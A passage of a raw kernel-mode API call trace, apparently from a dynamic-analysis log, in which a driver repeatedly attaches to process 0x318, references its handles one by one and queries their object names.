(ApcState=0xffffd000ac0cf400) [0289.798] PsReleaseProcessExitSynchronization () returned 0x2 [0289.798] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801c1 [0289.798] ObQueryNameString (in: Object=0xffffe0006999dc40, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.798] ObfDereferenceObject (Object=0xffffe0006999dc40) returned 0x7ffc [0289.799] IoCompleteRequest () returned 0x0 [0289.799] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.799] PsAcquireProcessExitSynchronization () returned 0x0 [0289.799] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.799] ObReferenceObjectByHandle (in: Handle=0x6c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000699a3db0, HandleInformation=0x0) returned 0x0 [0289.799] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.799] PsReleaseProcessExitSynchronization () returned 0x2 [0289.799] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801c0 [0289.799] ObQueryNameString (in: Object=0xffffe000699a3db0, ObjectNameInfo=0xffffe0006a4cf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4cf7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.799] ObfDereferenceObject (Object=0xffffe000699a3db0) returned 0x7ffe [0289.799] IoCompleteRequest () returned 0x0 [0289.799] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.799] PsAcquireProcessExitSynchronization () returned 0x0 [0289.799] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.799] ObReferenceObjectByHandle (in: Handle=0x7a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069a1f6e0, HandleInformation=0x0) returned 0x0 [0289.799] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.799] PsReleaseProcessExitSynchronization () returned 0x2 [0289.799] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801bf [0289.799] ObQueryNameString (in: Object=0xffffe00069a1f6e0, ObjectNameInfo=0xffffe0006a6b37c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6b37c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.799] ObfDereferenceObject (Object=0xffffe00069a1f6e0) returned 0x7ffe [0289.799] IoCompleteRequest () returned 0x0 [0289.799] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.799] PsAcquireProcessExitSynchronization () returned 0x0 [0289.799] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.799] ObReferenceObjectByHandle (in: Handle=0x7c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0007b7fef20, HandleInformation=0x0) returned 0x0 [0289.799] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.799] PsReleaseProcessExitSynchronization () returned 0x2 [0289.799] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801be [0289.799] ObQueryNameString (in: Object=0xffffe0007b7fef20, ObjectNameInfo=0xffffe0006a6657c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6657c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.799] ObfDereferenceObject (Object=0xffffe0007b7fef20) returned 0x7fff [0289.799] IoCompleteRequest () returned 0x0 [0289.799] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.799] PsAcquireProcessExitSynchronization () returned 0x0 [0289.799] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.799] ObReferenceObjectByHandle (in: Handle=0x818, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698907d0, HandleInformation=0x0) returned 0x0 [0289.799] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.799] PsReleaseProcessExitSynchronization () returned 0x2 [0289.799] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801bd [0289.799] ObQueryNameString (in: Object=0xffffe000698907d0, ObjectNameInfo=0xffffe00068415044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00068415044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.799] ObfDereferenceObject (Object=0xffffe000698907d0) returned 0x7fe3 [0289.799] IoCompleteRequest () returned 0x0 [0289.799] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.799] PsAcquireProcessExitSynchronization () returned 0x0 [0289.799] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.800] ObReferenceObjectByHandle (in: Handle=0x81c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069a71a50, HandleInformation=0x0) returned 0x0 [0289.800] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.800] PsReleaseProcessExitSynchronization () returned 0x2 [0289.800] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801bc [0289.800] ObQueryNameString (in: Object=0xffffe00069a71a50, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.800] ObfDereferenceObject (Object=0xffffe00069a71a50) returned 0x7fd6 [0289.800] IoCompleteRequest () returned 0x0 [0289.800] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.800] PsAcquireProcessExitSynchronization () returned 0x0 [0289.800] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.800] ObReferenceObjectByHandle (in: Handle=0x838, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069a76f20, HandleInformation=0x0) returned 0x0 [0289.800] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.800] PsReleaseProcessExitSynchronization () returned 0x2 [0289.800] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801bb [0289.800] ObQueryNameString (in: Object=0xffffe000756919d0, ObjectNameInfo=0xffffe0006a6c2044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6c2044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.800] ObfDereferenceObject (Object=0xffffe00069a76f20) returned 0x7fff [0289.800] IoCompleteRequest () returned 0x0 [0289.800] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.800] PsAcquireProcessExitSynchronization () returned 0x0 [0289.800] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.800] ObReferenceObjectByHandle (in: Handle=0x840, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069a76c40, HandleInformation=0x0) returned 0x0 [0289.800] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.800] PsReleaseProcessExitSynchronization () returned 0x2 [0289.800] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801ba [0289.800] ObQueryNameString (in: Object=0xffffe00069a76c40, ObjectNameInfo=0xffffe00069fd27c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069fd27c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.800] ObfDereferenceObject (Object=0xffffe00069a76c40) returned 0x7ff0 [0289.800] IoCompleteRequest () returned 0x0 [0289.800] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.800] PsAcquireProcessExitSynchronization () returned 0x0 [0289.800] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.800] ObReferenceObjectByHandle (in: Handle=0x844, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069dfc6d0, HandleInformation=0x0) returned 0x0 [0289.800] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.800] PsReleaseProcessExitSynchronization () returned 0x2 [0289.800] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801b9 [0289.800] ObQueryNameString (in: Object=0xffffe00069dfc6d0, ObjectNameInfo=0xffffe0006a37c644, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a37c644, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.800] ObfDereferenceObject (Object=0xffffe00069dfc6d0) returned 0x7ffe [0289.800] IoCompleteRequest () returned 0x0 [0289.800] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.800] PsAcquireProcessExitSynchronization () returned 0x0 [0289.800] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.800] ObReferenceObjectByHandle (in: Handle=0x860, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069a91b70, HandleInformation=0x0) returned 0x0 [0289.800] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.800] PsReleaseProcessExitSynchronization () returned 0x2 [0289.800] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801b8 [0289.800] ObQueryNameString (in: Object=0xffffe00069a91b70, ObjectNameInfo=0xffffe0006a625044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a625044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.801] ObfDereferenceObject (Object=0xffffe00069a91b70) returned 0x7521 [0289.801] IoCompleteRequest () returned 0x0 [0289.801] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.801] PsAcquireProcessExitSynchronization () returned 0x0 [0289.801] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.801] ObReferenceObjectByHandle (in: Handle=0xa20, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000792d5290, HandleInformation=0x0) returned 0x0 [0289.801] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.801] PsReleaseProcessExitSynchronization () returned 0x2 [0289.801] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801b7 [0289.801] ObQueryNameString (in: Object=0xffffe000792d5290, ObjectNameInfo=0xffffe0006a351044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a351044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.801] ObfDereferenceObject (Object=0xffffe000792d5290) returned 0x7fd7 [0289.801] IoCompleteRequest () returned 0x0 [0289.801] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.801] PsAcquireProcessExitSynchronization () returned 0x0 [0289.801] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.801] ObReferenceObjectByHandle (in: Handle=0xa84, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069ab6f20, HandleInformation=0x0) returned 0x0 [0289.801] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.801] PsReleaseProcessExitSynchronization () returned 0x2 [0289.801] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801b6 [0289.801] ObQueryNameString (in: Object=0xffffe00069ab6f20, ObjectNameInfo=0xffffe0006a7257c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a7257c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.801] ObfDereferenceObject (Object=0xffffe00069ab6f20) returned 0x7ffe [0289.801] IoCompleteRequest () returned 0x0 [0289.801] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.801] PsAcquireProcessExitSynchronization () returned 0x0 [0289.801] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.801] ObReferenceObjectByHandle (in: Handle=0xd54, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f21f20, HandleInformation=0x0) returned 0x0 [0289.801] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.801] PsReleaseProcessExitSynchronization () returned 0x2 [0289.801] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801b5 [0289.801] ObQueryNameString (in: Object=0xffffe00069f21f20, ObjectNameInfo=0xffffe0006a2ca044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2ca044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.801] ObfDereferenceObject (Object=0xffffe00069f21f20) returned 0x7fcf [0289.801] IoCompleteRequest () returned 0x0 [0289.801] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.801] PsAcquireProcessExitSynchronization () returned 0x0 [0289.801] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.801] ObReferenceObjectByHandle (in: Handle=0xd90, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a01bf20, HandleInformation=0x0) returned 0x0 [0289.801] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.801] PsReleaseProcessExitSynchronization () returned 0x2 [0289.801] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801b4 [0289.801] ObQueryNameString (in: Object=0xffffe0006a01bf20, ObjectNameInfo=0xffffe0006a6fe7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6fe7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.801] ObfDereferenceObject (Object=0xffffe0006a01bf20) returned 0x800e [0289.801] IoCompleteRequest () returned 0x0 [0289.801] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.802] PsAcquireProcessExitSynchronization () returned 0x0 [0289.802] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.802] ObReferenceObjectByHandle (in: Handle=0xdd4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069ba0390, HandleInformation=0x0) returned 0x0 [0289.802] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.802] PsReleaseProcessExitSynchronization () returned 0x2 [0289.802] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801b3 [0289.802] ObQueryNameString (in: Object=0xffffe00069ba0390, ObjectNameInfo=0xffffe000691a47c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe000691a47c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.802] ObfDereferenceObject (Object=0xffffe00069ba0390) returned 0x7ffd [0289.802] IoCompleteRequest () returned 0x0 [0289.802] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.802] PsAcquireProcessExitSynchronization () returned 0x0 [0289.802] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.802] ObReferenceObjectByHandle (in: Handle=0xe14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069bba090, HandleInformation=0x0) returned 0x0 [0289.802] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.802] PsReleaseProcessExitSynchronization () returned 0x2 [0289.802] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801b2 [0289.802] ObQueryNameString (in: Object=0xffffe00069bba090, ObjectNameInfo=0xffffe0006a3277c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a3277c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.802] ObfDereferenceObject (Object=0xffffe00069bba090) returned 0x7ffe [0289.802] IoCompleteRequest () returned 0x0 [0289.802] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.802] PsAcquireProcessExitSynchronization () returned 0x0 [0289.802] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.802] ObReferenceObjectByHandle (in: Handle=0xfc0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069d919a0, HandleInformation=0x0) returned 0x0 [0289.802] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.802] PsReleaseProcessExitSynchronization () returned 0x2 [0289.802] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801b1 [0289.802] ObQueryNameString (in: Object=0xffffe00069d919a0, ObjectNameInfo=0xffffe0006a4087c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4087c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.802] ObfDereferenceObject (Object=0xffffe00069d919a0) returned 0x7ffe [0289.802] IoCompleteRequest () returned 0x0 [0289.802] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.802] PsAcquireProcessExitSynchronization () returned 0x0 [0289.802] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.802] ObReferenceObjectByHandle (in: Handle=0x10b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069d9d210, HandleInformation=0x0) returned 0x0 [0289.802] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.802] PsReleaseProcessExitSynchronization () returned 0x2 [0289.802] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801b0 [0289.802] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006904d7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006904d7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.802] ObfDereferenceObject (Object=0xffffe00069d9d210) returned 0x7ffd [0289.802] IoCompleteRequest () returned 0x0 [0289.802] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.802] PsAcquireProcessExitSynchronization () returned 0x0 [0289.802] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.802] ObReferenceObjectByHandle (in: Handle=0x1134, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069e00ea0, HandleInformation=0x0) returned 0x0 [0289.802] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.803] PsReleaseProcessExitSynchronization () returned 0x2 [0289.803] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801af [0289.803] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6bc044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6bc044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.803] ObfDereferenceObject (Object=0xffffe00069e00ea0) returned 0x800b [0289.803] IoCompleteRequest () returned 0x0 [0289.803] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.803] PsAcquireProcessExitSynchronization () returned 0x0 [0289.803] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.803] ObReferenceObjectByHandle (in: Handle=0x1138, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069df9240, HandleInformation=0x0) returned 0x0 [0289.803] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.803] PsReleaseProcessExitSynchronization () returned 0x2 [0289.803] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801ae [0289.803] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.803] ObfDereferenceObject (Object=0xffffe00069df9240) returned 0x7fde [0289.803] IoCompleteRequest () returned 0x0 [0289.803] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.803] PsAcquireProcessExitSynchronization () returned 0x0 [0289.803] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.803] ObReferenceObjectByHandle (in: Handle=0x113c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069df9c40, HandleInformation=0x0) returned 0x0 [0289.803] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.803] PsReleaseProcessExitSynchronization () returned 0x2 [0289.803] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801ad [0289.803] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a721044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a721044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.803] ObfDereferenceObject (Object=0xffffe00069df9c40) returned 0x800b [0289.803] IoCompleteRequest () returned 0x0 [0289.803] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.803] PsAcquireProcessExitSynchronization () returned 0x0 [0289.803] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.803] ObReferenceObjectByHandle (in: Handle=0x1140, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069e00d30, HandleInformation=0x0) returned 0x0 [0289.803] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.803] PsReleaseProcessExitSynchronization () returned 0x2 [0289.803] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801ac [0289.803] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a5457c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5457c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.803] ObfDereferenceObject (Object=0xffffe00069e00d30) returned 0x7dc3 [0289.803] IoCompleteRequest () returned 0x0 [0289.803] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.803] PsAcquireProcessExitSynchronization () returned 0x0 [0289.803] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.803] ObReferenceObjectByHandle (in: Handle=0x1144, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069df9f20, HandleInformation=0x0) returned 0x0 [0289.803] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.803] PsReleaseProcessExitSynchronization () returned 0x2 [0289.803] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801ab [0289.803] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068423044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068423044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.803] ObfDereferenceObject (Object=0xffffe00069df9f20) returned 0x7e6d [0289.803] IoCompleteRequest () returned 0x0 [0289.804] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.804] PsAcquireProcessExitSynchronization () returned 0x0 [0289.804] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.804] ObReferenceObjectByHandle (in: Handle=0x1234, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f05d90, HandleInformation=0x0) returned 0x0 [0289.804] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.804] PsReleaseProcessExitSynchronization () returned 0x2 [0289.804] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801aa [0289.804] ObQueryNameString (in: Object=0xffffe00069f05d90, ObjectNameInfo=0xffffe0006a4f07c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4f07c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.804] ObfDereferenceObject (Object=0xffffe00069f05d90) returned 0x7ffe 